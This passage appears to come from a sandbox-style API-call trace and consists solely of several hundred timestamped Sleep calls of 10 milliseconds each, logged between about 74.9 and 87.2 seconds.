(dwMilliseconds=0xa) [0074.888] Sleep (dwMilliseconds=0xa) [0074.899] Sleep (dwMilliseconds=0xa) [0074.913] Sleep (dwMilliseconds=0xa) [0074.960] Sleep (dwMilliseconds=0xa) [0074.980] Sleep (dwMilliseconds=0xa) [0074.991] Sleep (dwMilliseconds=0xa) [0075.009] Sleep (dwMilliseconds=0xa) [0075.022] Sleep (dwMilliseconds=0xa) [0075.040] Sleep (dwMilliseconds=0xa) [0075.054] Sleep (dwMilliseconds=0xa) [0075.069] Sleep (dwMilliseconds=0xa) [0075.085] Sleep (dwMilliseconds=0xa) [0075.156] Sleep (dwMilliseconds=0xa) [0075.172] Sleep (dwMilliseconds=0xa) [0075.178] Sleep (dwMilliseconds=0xa) [0075.196] Sleep (dwMilliseconds=0xa) [0075.210] Sleep (dwMilliseconds=0xa) [0075.226] Sleep (dwMilliseconds=0xa) [0075.243] Sleep (dwMilliseconds=0xa) [0075.257] Sleep (dwMilliseconds=0xa) [0075.272] Sleep (dwMilliseconds=0xa) [0075.319] Sleep (dwMilliseconds=0xa) [0075.339] Sleep (dwMilliseconds=0xa) [0075.351] Sleep (dwMilliseconds=0xa) [0075.366] Sleep (dwMilliseconds=0xa) [0075.382] Sleep (dwMilliseconds=0xa) [0075.397] Sleep (dwMilliseconds=0xa) [0075.412] Sleep (dwMilliseconds=0xa) [0075.428] Sleep (dwMilliseconds=0xa) [0075.448] Sleep (dwMilliseconds=0xa) [0075.491] Sleep (dwMilliseconds=0xa) [0075.515] Sleep (dwMilliseconds=0xa) [0075.521] Sleep (dwMilliseconds=0xa) [0075.539] Sleep (dwMilliseconds=0xa) [0075.553] Sleep (dwMilliseconds=0xa) [0075.568] Sleep (dwMilliseconds=0xa) [0075.585] Sleep (dwMilliseconds=0xa) [0075.600] Sleep (dwMilliseconds=0xa) [0075.616] Sleep (dwMilliseconds=0xa) [0075.663] Sleep (dwMilliseconds=0xa) [0075.693] Sleep (dwMilliseconds=0xa) [0075.693] Sleep (dwMilliseconds=0xa) [0075.709] Sleep (dwMilliseconds=0xa) [0075.724] Sleep (dwMilliseconds=0xa) [0075.740] Sleep (dwMilliseconds=0xa) [0075.756] Sleep (dwMilliseconds=0xa) [0075.772] Sleep (dwMilliseconds=0xa) [0075.787] Sleep (dwMilliseconds=0xa) [0075.843] Sleep (dwMilliseconds=0xa) [0075.854] Sleep (dwMilliseconds=0xa) [0075.865] Sleep (dwMilliseconds=0xa) [0075.881] Sleep (dwMilliseconds=0xa) [0075.904] Sleep (dwMilliseconds=0xa) [0075.914] Sleep (dwMilliseconds=0xa) [0075.927] Sleep (dwMilliseconds=0xa) [0075.945] Sleep (dwMilliseconds=0xa) [0075.958] Sleep (dwMilliseconds=0xa) [0076.009] Sleep (dwMilliseconds=0xa) [0076.031] Sleep (dwMilliseconds=0xa) [0076.039] Sleep (dwMilliseconds=0xa) [0076.067] Sleep (dwMilliseconds=0xa) [0076.083] Sleep (dwMilliseconds=0xa) [0076.099] Sleep (dwMilliseconds=0xa) [0076.115] Sleep (dwMilliseconds=0xa) [0076.130] Sleep (dwMilliseconds=0xa) [0076.177] Sleep (dwMilliseconds=0xa) [0076.207] Sleep (dwMilliseconds=0xa) [0076.208] Sleep (dwMilliseconds=0xa) [0076.225] Sleep (dwMilliseconds=0xa) [0076.240] Sleep (dwMilliseconds=0xa) [0076.255] Sleep (dwMilliseconds=0xa) [0076.273] Sleep (dwMilliseconds=0xa) [0076.286] Sleep (dwMilliseconds=0xa) [0076.302] Sleep (dwMilliseconds=0xa) [0076.349] Sleep (dwMilliseconds=0xa) [0076.371] Sleep (dwMilliseconds=0xa) [0076.380] Sleep (dwMilliseconds=0xa) [0076.395] Sleep (dwMilliseconds=0xa) [0076.411] Sleep (dwMilliseconds=0xa) [0076.426] Sleep (dwMilliseconds=0xa) [0076.442] Sleep (dwMilliseconds=0xa) [0076.457] Sleep (dwMilliseconds=0xa) [0076.473] Sleep (dwMilliseconds=0xa) [0076.520] Sleep (dwMilliseconds=0xa) [0076.542] Sleep (dwMilliseconds=0xa) [0076.552] Sleep (dwMilliseconds=0xa) [0076.567] Sleep (dwMilliseconds=0xa) [0076.582] Sleep (dwMilliseconds=0xa) [0076.598] Sleep (dwMilliseconds=0xa) [0076.614] Sleep (dwMilliseconds=0xa) [0076.632] Sleep (dwMilliseconds=0xa) [0076.645] Sleep (dwMilliseconds=0xa) [0076.693] Sleep (dwMilliseconds=0xa) [0076.717] Sleep (dwMilliseconds=0xa) [0076.723] Sleep (dwMilliseconds=0xa) [0076.740] Sleep (dwMilliseconds=0xa) [0076.754] Sleep (dwMilliseconds=0xa) [0076.771] Sleep (dwMilliseconds=0xa) [0076.785] Sleep (dwMilliseconds=0xa) [0076.801] Sleep (dwMilliseconds=0xa) [0076.830] Sleep (dwMilliseconds=0xa) [0076.882] Sleep (dwMilliseconds=0xa) [0076.904] Sleep (dwMilliseconds=0xa) [0076.910] Sleep (dwMilliseconds=0xa) [0076.925] Sleep (dwMilliseconds=0xa) [0076.941] Sleep (dwMilliseconds=0xa) [0076.957] Sleep (dwMilliseconds=0xa) [0076.974] Sleep (dwMilliseconds=0xa) [0076.988] Sleep (dwMilliseconds=0xa) [0077.004] Sleep (dwMilliseconds=0xa) [0077.051] Sleep (dwMilliseconds=0xa) [0077.070] Sleep (dwMilliseconds=0xa) [0077.083] Sleep (dwMilliseconds=0xa) [0077.097] Sleep (dwMilliseconds=0xa) [0077.113] Sleep (dwMilliseconds=0xa) [0077.128] Sleep (dwMilliseconds=0xa) [0077.144] Sleep (dwMilliseconds=0xa) [0077.160] Sleep (dwMilliseconds=0xa) [0077.175] Sleep (dwMilliseconds=0xa) [0077.233] Sleep (dwMilliseconds=0xa) [0077.252] Sleep (dwMilliseconds=0xa) [0077.253] Sleep (dwMilliseconds=0xa) [0077.269] Sleep (dwMilliseconds=0xa) [0077.286] Sleep (dwMilliseconds=0xa) [0077.301] Sleep (dwMilliseconds=0xa) [0077.316] Sleep (dwMilliseconds=0xa) [0077.331] Sleep (dwMilliseconds=0xa) [0077.351] Sleep (dwMilliseconds=0xa) [0077.394] Sleep (dwMilliseconds=0xa) [0077.417] Sleep (dwMilliseconds=0xa) [0077.425] Sleep (dwMilliseconds=0xa) [0077.440] Sleep (dwMilliseconds=0xa) [0077.456] Sleep (dwMilliseconds=0xa) [0077.472] Sleep (dwMilliseconds=0xa) [0077.487] Sleep (dwMilliseconds=0xa) [0077.503] Sleep (dwMilliseconds=0xa) [0077.519] Sleep (dwMilliseconds=0xa) [0077.565] Sleep (dwMilliseconds=0xa) [0077.586] Sleep (dwMilliseconds=0xa) [0077.596] Sleep (dwMilliseconds=0xa) [0077.612] Sleep (dwMilliseconds=0xa) [0077.629] Sleep (dwMilliseconds=0xa) [0077.644] Sleep (dwMilliseconds=0xa) [0077.659] Sleep (dwMilliseconds=0xa) [0077.674] Sleep (dwMilliseconds=0xa) [0077.690] Sleep (dwMilliseconds=0xa) [0077.744] Sleep (dwMilliseconds=0xa) [0077.763] Sleep (dwMilliseconds=0xa) [0077.768] Sleep (dwMilliseconds=0xa) [0077.783] Sleep (dwMilliseconds=0xa) [0077.799] Sleep (dwMilliseconds=0xa) [0077.818] Sleep (dwMilliseconds=0xa) [0077.844] Sleep (dwMilliseconds=0xa) [0077.846] Sleep (dwMilliseconds=0xa) [0077.862] Sleep (dwMilliseconds=0xa) [0077.902] Sleep (dwMilliseconds=0xa) [0077.936] Sleep (dwMilliseconds=0xa) [0077.939] Sleep (dwMilliseconds=0xa) [0077.956] Sleep (dwMilliseconds=0xa) [0077.974] Sleep (dwMilliseconds=0xa) [0077.986] Sleep (dwMilliseconds=0xa) [0078.002] Sleep (dwMilliseconds=0xa) [0078.028] Sleep (dwMilliseconds=0xa) [0078.033] Sleep (dwMilliseconds=0xa) [0078.080] Sleep (dwMilliseconds=0xa) [0078.095] Sleep (dwMilliseconds=0xa) [0078.113] Sleep (dwMilliseconds=0xa) [0078.133] Sleep (dwMilliseconds=0xa) [0078.142] Sleep (dwMilliseconds=0xa) [0078.158] Sleep (dwMilliseconds=0xa) [0078.176] Sleep (dwMilliseconds=0xa) [0078.189] Sleep (dwMilliseconds=0xa) [0078.236] Sleep (dwMilliseconds=0xa) [0078.265] Sleep (dwMilliseconds=0xa) [0078.267] Sleep (dwMilliseconds=0xa) [0078.284] Sleep (dwMilliseconds=0xa) [0078.298] Sleep (dwMilliseconds=0xa) [0078.314] Sleep (dwMilliseconds=0xa) [0078.329] Sleep (dwMilliseconds=0xa) [0078.345] Sleep (dwMilliseconds=0xa) [0078.361] Sleep (dwMilliseconds=0xa) [0078.409] Sleep (dwMilliseconds=0xa) [0078.423] Sleep (dwMilliseconds=0xa) [0078.439] Sleep (dwMilliseconds=0xa) [0078.456] Sleep (dwMilliseconds=0xa) [0078.470] Sleep (dwMilliseconds=0xa) [0078.486] Sleep (dwMilliseconds=0xa) [0078.501] Sleep (dwMilliseconds=0xa) [0078.518] Sleep (dwMilliseconds=0xa) [0078.563] Sleep (dwMilliseconds=0xa) [0078.583] Sleep (dwMilliseconds=0xa) [0078.595] Sleep (dwMilliseconds=0xa) [0078.611] Sleep (dwMilliseconds=0xa) [0078.629] Sleep (dwMilliseconds=0xa) [0078.641] Sleep (dwMilliseconds=0xa) [0078.657] Sleep (dwMilliseconds=0xa) [0078.673] Sleep (dwMilliseconds=0xa) [0078.720] Sleep (dwMilliseconds=0xa) [0078.738] Sleep (dwMilliseconds=0xa) [0078.751] Sleep (dwMilliseconds=0xa) [0078.766] Sleep (dwMilliseconds=0xa) [0078.783] Sleep (dwMilliseconds=0xa) [0078.798] Sleep (dwMilliseconds=0xa) [0078.814] Sleep (dwMilliseconds=0xa) [0078.851] Sleep (dwMilliseconds=0xa) [0078.891] Sleep (dwMilliseconds=0xa) [0078.907] Sleep (dwMilliseconds=0xa) [0078.922] Sleep (dwMilliseconds=0xa) [0078.938] Sleep (dwMilliseconds=0xa) [0078.953] Sleep (dwMilliseconds=0xa) [0078.969] Sleep (dwMilliseconds=0xa) [0078.985] Sleep (dwMilliseconds=0xa) [0079.002] Sleep (dwMilliseconds=0xa) [0079.048] Sleep (dwMilliseconds=0xa) [0079.063] Sleep (dwMilliseconds=0xa) [0079.078] Sleep (dwMilliseconds=0xa) [0079.094] Sleep (dwMilliseconds=0xa) [0079.110] Sleep (dwMilliseconds=0xa) [0079.125] Sleep (dwMilliseconds=0xa) [0079.141] Sleep (dwMilliseconds=0xa) [0079.156] Sleep (dwMilliseconds=0xa) [0079.203] Sleep (dwMilliseconds=0xa) [0079.219] Sleep (dwMilliseconds=0xa) [0079.239] Sleep (dwMilliseconds=0xa) [0079.251] Sleep (dwMilliseconds=0xa) [0079.265] Sleep (dwMilliseconds=0xa) [0079.281] Sleep (dwMilliseconds=0xa) [0079.297] Sleep (dwMilliseconds=0xa) [0079.312] Sleep (dwMilliseconds=0xa) [0079.359] Sleep (dwMilliseconds=0xa) [0079.392] Sleep (dwMilliseconds=0xa) [0079.406] Sleep (dwMilliseconds=0xa) [0079.421] Sleep (dwMilliseconds=0xa) [0079.437] Sleep (dwMilliseconds=0xa) [0079.453] Sleep (dwMilliseconds=0xa) [0079.468] Sleep (dwMilliseconds=0xa) [0079.485] Sleep (dwMilliseconds=0xa) [0079.501] Sleep (dwMilliseconds=0xa) [0079.548] Sleep (dwMilliseconds=0xa) [0079.565] Sleep (dwMilliseconds=0xa) [0079.577] Sleep (dwMilliseconds=0xa) [0079.593] Sleep (dwMilliseconds=0xa) [0079.609] Sleep (dwMilliseconds=0xa) [0079.624] Sleep (dwMilliseconds=0xa) [0079.641] Sleep (dwMilliseconds=0xa) [0079.656] Sleep (dwMilliseconds=0xa) [0079.706] Sleep (dwMilliseconds=0xa) [0079.738] Sleep (dwMilliseconds=0xa) [0079.749] Sleep (dwMilliseconds=0xa) [0079.765] Sleep (dwMilliseconds=0xa) [0079.785] Sleep (dwMilliseconds=0xa) [0079.798] Sleep (dwMilliseconds=0xa) [0079.812] Sleep (dwMilliseconds=0xa) [0079.848] Sleep (dwMilliseconds=0xa) [0079.892] Sleep (dwMilliseconds=0xa) [0079.912] Sleep (dwMilliseconds=0xa) [0079.922] Sleep (dwMilliseconds=0xa) [0079.937] Sleep (dwMilliseconds=0xa) [0079.952] Sleep (dwMilliseconds=0xa) [0079.975] Sleep (dwMilliseconds=0xa) [0079.983] Sleep (dwMilliseconds=0xa) [0079.999] Sleep (dwMilliseconds=0xa) [0080.021] Sleep (dwMilliseconds=0xa) [0080.061] Sleep (dwMilliseconds=0xa) [0080.082] Sleep (dwMilliseconds=0xa) [0080.092] Sleep (dwMilliseconds=0xa) [0080.108] Sleep (dwMilliseconds=0xa) [0080.125] Sleep (dwMilliseconds=0xa) [0080.141] Sleep (dwMilliseconds=0xa) [0080.155] Sleep (dwMilliseconds=0xa) [0080.171] Sleep (dwMilliseconds=0xa) [0080.186] Sleep (dwMilliseconds=0xa) [0080.233] Sleep (dwMilliseconds=0xa) [0080.248] Sleep (dwMilliseconds=0xa) [0080.264] Sleep (dwMilliseconds=0xa) [0080.282] Sleep (dwMilliseconds=0xa) [0080.295] Sleep (dwMilliseconds=0xa) [0080.311] Sleep (dwMilliseconds=0xa) [0080.326] Sleep (dwMilliseconds=0xa) [0080.342] Sleep (dwMilliseconds=0xa) [0080.389] Sleep (dwMilliseconds=0xa) [0080.405] Sleep (dwMilliseconds=0xa) [0080.420] Sleep (dwMilliseconds=0xa) [0080.436] Sleep (dwMilliseconds=0xa) [0080.451] Sleep (dwMilliseconds=0xa) [0080.467] Sleep (dwMilliseconds=0xa) [0080.483] Sleep (dwMilliseconds=0xa) [0080.498] Sleep (dwMilliseconds=0xa) [0080.546] Sleep (dwMilliseconds=0xa) [0080.565] Sleep (dwMilliseconds=0xa) [0080.576] Sleep (dwMilliseconds=0xa) [0080.592] Sleep (dwMilliseconds=0xa) [0080.607] Sleep (dwMilliseconds=0xa) [0080.623] Sleep (dwMilliseconds=0xa) [0080.639] Sleep (dwMilliseconds=0xa) [0080.655] Sleep (dwMilliseconds=0xa) [0080.674] Sleep (dwMilliseconds=0xa) [0080.717] Sleep (dwMilliseconds=0xa) [0080.759] Sleep (dwMilliseconds=0xa) [0080.763] Sleep (dwMilliseconds=0xa) [0080.779] Sleep (dwMilliseconds=0xa) [0080.794] Sleep (dwMilliseconds=0xa) [0080.819] Sleep (dwMilliseconds=0xa) [0080.826] Sleep (dwMilliseconds=0xa) [0080.858] Sleep (dwMilliseconds=0xa) [0080.911] Sleep (dwMilliseconds=0xa) [0080.924] Sleep (dwMilliseconds=0xa) [0080.935] Sleep (dwMilliseconds=0xa) [0080.950] Sleep (dwMilliseconds=0xa) [0080.968] Sleep (dwMilliseconds=0xa) [0080.982] Sleep (dwMilliseconds=0xa) [0080.997] Sleep (dwMilliseconds=0xa) [0081.013] Sleep (dwMilliseconds=0xa) [0081.028] Sleep (dwMilliseconds=0xa) [0081.063] Sleep (dwMilliseconds=0xa) [0081.091] Sleep (dwMilliseconds=0xa) [0081.106] Sleep (dwMilliseconds=0xa) [0081.122] Sleep (dwMilliseconds=0xa) [0081.137] Sleep (dwMilliseconds=0xa) [0081.153] Sleep (dwMilliseconds=0xa) [0081.169] Sleep (dwMilliseconds=0xa) [0081.184] Sleep (dwMilliseconds=0xa) [0081.231] Sleep (dwMilliseconds=0xa) [0081.247] Sleep (dwMilliseconds=0xa) [0081.274] Sleep (dwMilliseconds=0xa) [0081.278] Sleep (dwMilliseconds=0xa) [0081.294] Sleep (dwMilliseconds=0xa) [0081.310] Sleep (dwMilliseconds=0xa) [0081.327] Sleep (dwMilliseconds=0xa) [0081.341] Sleep (dwMilliseconds=0xa) [0081.389] Sleep (dwMilliseconds=0xa) [0081.403] Sleep (dwMilliseconds=0xa) [0081.418] Sleep (dwMilliseconds=0xa) [0081.435] Sleep (dwMilliseconds=0xa) [0081.450] Sleep (dwMilliseconds=0xa) [0081.465] Sleep (dwMilliseconds=0xa) [0081.481] Sleep (dwMilliseconds=0xa) [0081.497] Sleep (dwMilliseconds=0xa) [0081.544] Sleep (dwMilliseconds=0xa) [0081.559] Sleep (dwMilliseconds=0xa) [0081.574] Sleep (dwMilliseconds=0xa) [0081.590] Sleep (dwMilliseconds=0xa) [0081.606] Sleep (dwMilliseconds=0xa) [0081.622] Sleep (dwMilliseconds=0xa) [0081.638] Sleep (dwMilliseconds=0xa) [0081.655] Sleep (dwMilliseconds=0xa) [0081.717] Sleep (dwMilliseconds=0xa) [0081.737] Sleep (dwMilliseconds=0xa) [0081.753] Sleep (dwMilliseconds=0xa) [0081.761] Sleep (dwMilliseconds=0xa) [0081.783] Sleep (dwMilliseconds=0xa) [0081.793] Sleep (dwMilliseconds=0xa) [0081.816] Sleep (dwMilliseconds=0xa) [0081.824] Sleep (dwMilliseconds=0xa) [0081.867] Sleep (dwMilliseconds=0xa) [0081.903] Sleep (dwMilliseconds=0xa) [0081.937] Sleep (dwMilliseconds=0xa) [0081.949] Sleep (dwMilliseconds=0xa) [0081.964] Sleep (dwMilliseconds=0xa) [0081.981] Sleep (dwMilliseconds=0xa) [0081.996] Sleep (dwMilliseconds=0xa) [0082.011] Sleep (dwMilliseconds=0xa) [0082.027] Sleep (dwMilliseconds=0xa) [0082.043] Sleep (dwMilliseconds=0xa) [0082.090] Sleep (dwMilliseconds=0xa) [0082.110] Sleep (dwMilliseconds=0xa) [0082.120] Sleep (dwMilliseconds=0xa) [0082.136] Sleep (dwMilliseconds=0xa) [0082.152] Sleep (dwMilliseconds=0xa) [0082.167] Sleep (dwMilliseconds=0xa) [0082.183] Sleep (dwMilliseconds=0xa) [0082.199] Sleep (dwMilliseconds=0xa) [0082.214] Sleep (dwMilliseconds=0xa) [0082.271] Sleep (dwMilliseconds=0xa) [0082.289] Sleep (dwMilliseconds=0xa) [0082.292] Sleep (dwMilliseconds=0xa) [0082.309] Sleep (dwMilliseconds=0xa) [0082.323] Sleep (dwMilliseconds=0xa) [0082.339] Sleep (dwMilliseconds=0xa) [0082.354] Sleep (dwMilliseconds=0xa) [0082.370] Sleep (dwMilliseconds=0xa) [0082.385] Sleep (dwMilliseconds=0xa) [0082.433] Sleep (dwMilliseconds=0xa) [0082.454] Sleep (dwMilliseconds=0xa) [0082.464] Sleep (dwMilliseconds=0xa) [0082.479] Sleep (dwMilliseconds=0xa) [0082.495] Sleep (dwMilliseconds=0xa) [0082.510] Sleep (dwMilliseconds=0xa) [0082.526] Sleep (dwMilliseconds=0xa) [0082.542] Sleep (dwMilliseconds=0xa) [0082.557] Sleep (dwMilliseconds=0xa) [0082.604] Sleep (dwMilliseconds=0xa) [0082.621] Sleep (dwMilliseconds=0xa) [0082.636] Sleep (dwMilliseconds=0xa) [0082.652] Sleep (dwMilliseconds=0xa) [0082.668] Sleep (dwMilliseconds=0xa) [0082.682] Sleep (dwMilliseconds=0xa) [0082.697] Sleep (dwMilliseconds=0xa) [0082.713] Sleep (dwMilliseconds=0xa) [0082.762] Sleep (dwMilliseconds=0xa) [0082.789] Sleep (dwMilliseconds=0xa) [0082.791] Sleep (dwMilliseconds=0xa) [0082.807] Sleep (dwMilliseconds=0xa) [0082.834] Sleep (dwMilliseconds=0xa) [0082.858] Sleep (dwMilliseconds=0xa) [0082.869] Sleep (dwMilliseconds=0xa) [0082.885] Sleep (dwMilliseconds=0xa) [0082.932] Sleep (dwMilliseconds=0xa) [0082.947] Sleep (dwMilliseconds=0xa) [0082.963] Sleep (dwMilliseconds=0xa) [0082.979] Sleep (dwMilliseconds=0xa) [0082.994] Sleep (dwMilliseconds=0xa) [0083.009] Sleep (dwMilliseconds=0xa) [0083.025] Sleep (dwMilliseconds=0xa) [0083.042] Sleep (dwMilliseconds=0xa) [0083.089] Sleep (dwMilliseconds=0xa) [0083.103] Sleep (dwMilliseconds=0xa) [0083.119] Sleep (dwMilliseconds=0xa) [0083.134] Sleep (dwMilliseconds=0xa) [0083.150] Sleep (dwMilliseconds=0xa) [0083.166] Sleep (dwMilliseconds=0xa) [0083.182] Sleep (dwMilliseconds=0xa) [0083.197] Sleep (dwMilliseconds=0xa) [0083.244] Sleep (dwMilliseconds=0xa) [0083.260] Sleep (dwMilliseconds=0xa) [0083.283] Sleep (dwMilliseconds=0xa) [0083.290] Sleep (dwMilliseconds=0xa) [0083.306] Sleep (dwMilliseconds=0xa) [0083.322] Sleep (dwMilliseconds=0xa) [0083.337] Sleep (dwMilliseconds=0xa) [0083.353] Sleep (dwMilliseconds=0xa) [0083.400] Sleep (dwMilliseconds=0xa) [0083.415] Sleep (dwMilliseconds=0xa) [0083.431] Sleep (dwMilliseconds=0xa) [0083.446] Sleep (dwMilliseconds=0xa) [0083.467] Sleep (dwMilliseconds=0xa) [0083.478] Sleep (dwMilliseconds=0xa) [0083.494] Sleep (dwMilliseconds=0xa) [0083.509] Sleep (dwMilliseconds=0xa) [0083.542] Sleep (dwMilliseconds=0xa) [0083.571] Sleep (dwMilliseconds=0xa) [0083.571] Sleep (dwMilliseconds=0xa) [0083.587] Sleep (dwMilliseconds=0xa) [0083.602] Sleep (dwMilliseconds=0xa) [0083.618] Sleep (dwMilliseconds=0xa) [0083.642] Sleep (dwMilliseconds=0xa) [0083.649] Sleep (dwMilliseconds=0xa) [0083.665] Sleep (dwMilliseconds=0xa) [0083.712] Sleep (dwMilliseconds=0xa) [0083.741] Sleep (dwMilliseconds=0xa) [0083.743] Sleep (dwMilliseconds=0xa) [0083.758] Sleep (dwMilliseconds=0xa) [0083.774] Sleep (dwMilliseconds=0xa) [0083.791] Sleep (dwMilliseconds=0xa) [0083.814] Sleep (dwMilliseconds=0xa) [0083.821] Sleep (dwMilliseconds=0xa) [0083.855] Sleep (dwMilliseconds=0xa) [0083.900] Sleep (dwMilliseconds=0xa) [0083.938] Sleep (dwMilliseconds=0xa) [0083.945] Sleep (dwMilliseconds=0xa) [0083.961] Sleep (dwMilliseconds=0xa) [0083.979] Sleep (dwMilliseconds=0xa) [0083.993] Sleep (dwMilliseconds=0xa) [0084.009] Sleep (dwMilliseconds=0xa) [0084.055] Sleep (dwMilliseconds=0xa) [0084.070] Sleep (dwMilliseconds=0xa) [0084.086] Sleep (dwMilliseconds=0xa) [0084.102] Sleep (dwMilliseconds=0xa) [0084.119] Sleep (dwMilliseconds=0xa) [0084.133] Sleep (dwMilliseconds=0xa) [0084.148] Sleep (dwMilliseconds=0xa) [0084.164] Sleep (dwMilliseconds=0xa) [0084.211] Sleep (dwMilliseconds=0xa) [0084.231] Sleep (dwMilliseconds=0xa) [0084.242] Sleep (dwMilliseconds=0xa) [0084.258] Sleep (dwMilliseconds=0xa) [0084.283] Sleep (dwMilliseconds=0xa) [0084.289] Sleep (dwMilliseconds=0xa) [0084.304] Sleep (dwMilliseconds=0xa) [0084.322] Sleep (dwMilliseconds=0xa) [0084.337] Sleep (dwMilliseconds=0xa) [0084.384] Sleep (dwMilliseconds=0xa) [0084.406] Sleep (dwMilliseconds=0xa) [0084.414] Sleep (dwMilliseconds=0xa) [0084.430] Sleep (dwMilliseconds=0xa) [0084.445] Sleep (dwMilliseconds=0xa) [0084.465] Sleep (dwMilliseconds=0xa) [0084.476] Sleep (dwMilliseconds=0xa) [0084.493] Sleep (dwMilliseconds=0xa) [0084.507] Sleep (dwMilliseconds=0xa) [0084.556] Sleep (dwMilliseconds=0xa) [0084.581] Sleep (dwMilliseconds=0xa) [0084.587] Sleep (dwMilliseconds=0xa) [0084.601] Sleep (dwMilliseconds=0xa) [0084.617] Sleep (dwMilliseconds=0xa) [0084.632] Sleep (dwMilliseconds=0xa) [0084.649] Sleep (dwMilliseconds=0xa) [0084.665] Sleep (dwMilliseconds=0xa) [0084.679] Sleep (dwMilliseconds=0xa) [0084.726] Sleep (dwMilliseconds=0xa) [0084.752] Sleep (dwMilliseconds=0xa) [0084.757] Sleep (dwMilliseconds=0xa) [0084.772] Sleep (dwMilliseconds=0xa) [0084.788] Sleep (dwMilliseconds=0xa) [0084.804] Sleep (dwMilliseconds=0xa) [0084.832] Sleep (dwMilliseconds=0xa) [0084.848] Sleep (dwMilliseconds=0xa) [0084.851] Sleep (dwMilliseconds=0xa) [0084.900] Sleep (dwMilliseconds=0xa) [0084.924] Sleep (dwMilliseconds=0xa) [0084.930] Sleep (dwMilliseconds=0xa) [0084.946] Sleep (dwMilliseconds=0xa) [0084.960] Sleep (dwMilliseconds=0xa) [0084.990] Sleep (dwMilliseconds=0xa) [0084.993] Sleep (dwMilliseconds=0xa) [0085.010] Sleep (dwMilliseconds=0xa) [0085.029] Sleep (dwMilliseconds=0xa) [0085.075] Sleep (dwMilliseconds=0xa) [0085.093] Sleep (dwMilliseconds=0xa) [0085.106] Sleep (dwMilliseconds=0xa) [0085.116] Sleep (dwMilliseconds=0xa) [0085.131] Sleep (dwMilliseconds=0xa) [0085.147] Sleep (dwMilliseconds=0xa) [0085.165] Sleep (dwMilliseconds=0xa) [0085.181] Sleep (dwMilliseconds=0xa) [0085.195] Sleep (dwMilliseconds=0xa) [0085.245] Sleep (dwMilliseconds=0xa) [0085.268] Sleep (dwMilliseconds=0xa) [0085.283] Sleep (dwMilliseconds=0xa) [0085.288] Sleep (dwMilliseconds=0xa) [0085.303] Sleep (dwMilliseconds=0xa) [0085.318] Sleep (dwMilliseconds=0xa) [0085.334] Sleep (dwMilliseconds=0xa) [0085.350] Sleep (dwMilliseconds=0xa) [0085.365] Sleep (dwMilliseconds=0xa) [0085.412] Sleep (dwMilliseconds=0xa) [0085.434] Sleep (dwMilliseconds=0xa) [0085.443] Sleep (dwMilliseconds=0xa) [0085.459] Sleep (dwMilliseconds=0xa) [0085.474] Sleep (dwMilliseconds=0xa) [0085.491] Sleep (dwMilliseconds=0xa) [0085.506] Sleep (dwMilliseconds=0xa) [0085.521] Sleep (dwMilliseconds=0xa) [0085.537] Sleep (dwMilliseconds=0xa) [0085.584] Sleep (dwMilliseconds=0xa) [0085.604] Sleep (dwMilliseconds=0xa) [0085.617] Sleep (dwMilliseconds=0xa) [0085.631] Sleep (dwMilliseconds=0xa) [0085.664] Sleep (dwMilliseconds=0xa) [0085.678] Sleep (dwMilliseconds=0xa) [0085.693] Sleep (dwMilliseconds=0xa) [0085.709] Sleep (dwMilliseconds=0xa) [0085.757] Sleep (dwMilliseconds=0xa) [0085.777] Sleep (dwMilliseconds=0xa) [0085.786] Sleep (dwMilliseconds=0xa) [0085.802] Sleep (dwMilliseconds=0xa) [0085.819] Sleep (dwMilliseconds=0xa) [0085.850] Sleep (dwMilliseconds=0xa) [0085.865] Sleep (dwMilliseconds=0xa) [0085.880] Sleep (dwMilliseconds=0xa) [0085.928] Sleep (dwMilliseconds=0xa) [0085.951] Sleep (dwMilliseconds=0xa) [0085.958] Sleep (dwMilliseconds=0xa) [0085.974] Sleep (dwMilliseconds=0xa) [0085.992] Sleep (dwMilliseconds=0xa) [0086.005] Sleep (dwMilliseconds=0xa) [0086.021] Sleep (dwMilliseconds=0xa) [0086.036] Sleep (dwMilliseconds=0xa) [0086.052] Sleep (dwMilliseconds=0xa) [0086.098] Sleep (dwMilliseconds=0xa) [0086.119] Sleep (dwMilliseconds=0xa) [0086.130] Sleep (dwMilliseconds=0xa) [0086.145] Sleep (dwMilliseconds=0xa) [0086.161] Sleep (dwMilliseconds=0xa) [0086.177] Sleep (dwMilliseconds=0xa) [0086.192] Sleep (dwMilliseconds=0xa) [0086.208] Sleep (dwMilliseconds=0xa) [0086.225] Sleep (dwMilliseconds=0xa) [0086.270] Sleep (dwMilliseconds=0xa) [0086.289] Sleep (dwMilliseconds=0xa) [0086.301] Sleep (dwMilliseconds=0xa) [0086.317] Sleep (dwMilliseconds=0xa) [0086.333] Sleep (dwMilliseconds=0xa) [0086.349] Sleep (dwMilliseconds=0xa) [0086.364] Sleep (dwMilliseconds=0xa) [0086.381] Sleep (dwMilliseconds=0xa) [0086.395] Sleep (dwMilliseconds=0xa) [0086.442] Sleep (dwMilliseconds=0xa) [0086.458] Sleep (dwMilliseconds=0xa) [0086.473] Sleep (dwMilliseconds=0xa) [0086.489] Sleep (dwMilliseconds=0xa) [0086.504] Sleep (dwMilliseconds=0xa) [0086.520] Sleep (dwMilliseconds=0xa) [0086.535] Sleep (dwMilliseconds=0xa) [0086.551] Sleep (dwMilliseconds=0xa) [0086.598] Sleep (dwMilliseconds=0xa) [0086.619] Sleep (dwMilliseconds=0xa) [0086.629] Sleep (dwMilliseconds=0xa) [0086.645] Sleep (dwMilliseconds=0xa) [0086.660] Sleep (dwMilliseconds=0xa) [0086.675] Sleep (dwMilliseconds=0xa) [0086.693] Sleep (dwMilliseconds=0xa) [0086.709] Sleep (dwMilliseconds=0xa) [0086.722] Sleep (dwMilliseconds=0xa) [0086.769] Sleep (dwMilliseconds=0xa) [0086.785] Sleep (dwMilliseconds=0xa) [0086.801] Sleep (dwMilliseconds=0xa) [0086.816] Sleep (dwMilliseconds=0xa) [0086.849] Sleep (dwMilliseconds=0xa) [0086.863] Sleep (dwMilliseconds=0xa) [0086.878] Sleep (dwMilliseconds=0xa) [0086.926] Sleep (dwMilliseconds=0xa) [0086.941] Sleep (dwMilliseconds=0xa) [0086.956] Sleep (dwMilliseconds=0xa) [0086.972] Sleep (dwMilliseconds=0xa) [0086.988] Sleep (dwMilliseconds=0xa) [0087.003] Sleep (dwMilliseconds=0xa) [0087.019] Sleep (dwMilliseconds=0xa) [0087.035] Sleep (dwMilliseconds=0xa) [0087.082] Sleep (dwMilliseconds=0xa) [0087.103] Sleep (dwMilliseconds=0xa) [0087.113] Sleep (dwMilliseconds=0xa) [0087.128] Sleep (dwMilliseconds=0xa) [0087.145] Sleep (dwMilliseconds=0xa) [0087.160] 